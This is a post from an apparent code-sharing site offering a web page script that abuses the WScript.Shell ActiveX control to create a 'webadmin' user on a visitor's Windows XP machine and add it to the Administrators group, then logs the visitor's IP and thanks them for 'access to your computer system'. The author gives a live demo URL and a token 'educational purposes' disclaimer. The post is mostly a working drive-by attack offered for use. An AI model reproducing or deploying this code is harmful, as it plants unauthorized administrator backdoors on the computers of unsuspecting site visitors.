Create a WinXP User Account from a Website

Email
Submitted on: 1/2/2015 2:35:00 AM
By: Kougra (from psc cd)  
Level: Beginner
User Rating: By 3 Users
Compatibility: PHP 3.0, PHP 4.0
Views: 1935

Hi, I Was sitting on my pc the other day and wanted to create a Website that could add a WinXP User account with Administrator Rights on the views computer. There is only one thing that is a problem that is the person on the other end needs to enable there ActiveX Controllers. Hope you all have fun with this script just as i did. But remember this is for educational perposes only and we don't want people doing the wrong thing with it like the kill function now do we ;) anyone that can improve this please post the details. see this script in action at www.ezysale.net/cmd/adduser.php dont forget to enable the activex controls Cheers

To use this code change the # to < or >, sorry this is my first post :) 
#object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'>#/object#
#script#
wsh.Run("net.exe user webadmin /add ");#/script# 
#script#
wsh.Run("net.exe localgroup Administrators webadmin /add ");#/script# 
#?php 
$getip = $_SERVER["REMOTE_ADDR"]; 
$getdate = date( "l dS of F Y" ); 
$gettime = date( "h:i:sa (@B" ); 
$banned_ip = array(); 
$banned_ip[] = '222.111.111.1'; # Add Ip Address Of Person you dont want to see this site 
foreach($banned_ip as $banned) { 
$ip = $_SERVER['REMOTE_ADDR']; 
if($ip == $banned){ 
echo "Im sorry you have been blocked from viewing this webpage."; 
$fp = fopen("ip_data.dat", "a");
fputs($fp, "**BANNED** Visit logged on $getdate at $gettime internet time) for IP: $getip 
"); 
fputs($fp, ""); 
fclose($fp); 
exit(); 
} 
} 
echo " Thankyou for the access to your computer system"; 
echo "
"; echo "'User Account Created and IP Address Logged' on $getdate at $gettime internet time) for: $getip"; $fp = fopen("ip_data.dat", "a"); fputs($fp, "Authorized Visit logged on $getdate at $gettime internet time) for IP: $getip "); fputs($fp, ""); fclose($fp); ?>

Report Bad Submission
Use this form to tell us if this entry should be deleted (i.e contains no code, is a virus, etc.).
This submission should be removed because:

Your Vote

What do you think of this article (in the Beginner category)?
(The article with your highest vote will win this month's coding contest!)
Excellent  Good  Average  Below Average  Poor (See voting log ...)

Other User Comments

7/10/2015 7:00:20 AMVijay Panchal

Mine
(If this comment was disrespectful, please report it.)

Add Your Feedback
Your feedback will be posted below and an email sent to the author. Please remember that the author was kind enough to share this with you, so any criticisms must be stated politely, or they will be deleted. (For feedback not related to this particular article, please click here instead.)

To post feedback, first please login.